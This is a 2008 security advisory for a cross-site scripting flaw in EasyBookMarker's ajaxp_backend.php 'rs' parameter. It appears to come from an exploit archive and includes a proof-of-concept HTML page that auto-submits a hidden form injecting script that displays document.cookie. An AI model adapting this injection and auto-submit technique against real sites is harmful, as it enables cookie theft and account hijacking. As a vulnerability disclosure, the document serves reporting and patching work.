EasyBookMarker "rs" Cross-Site Scripting

EasyBookMarker "rs" Cross-Site Scripting :: 2008-07-22

POC or Exploit :

----------------------------------------------------------------

Script : Easybookmarker 40tr

Type : Xss Vulnerability

Method : POST

Alert : High

----------------------------------------------------------------

Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

My Offical Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

----------------------------------------------------------------

Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR

----------------------------------------------------------------

Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip

----------------------------------------------------------------
Xss Vulnerability :

Variable : rs
Send Method : POST

Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test vulnerability

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://example/zomplog/ajaxp_backend.php"

method="POST" name="form">

<input type="hidden" name="rs" value="" <script>alert(document.cookie)</script>">

</form>
</body>
</html>

----------------------------------------------------------------

Tnx : God

HTTP://IRCRASH.COM

----------------------------------------------------------------

Download

Advisory On SECURITYFOCUS :

http://www.securityfocus.com/bid/30304

Advisory On SECUNIA :

http://secunia.com/advisories/31191/

Latest Blog Posts

Links

Subscribe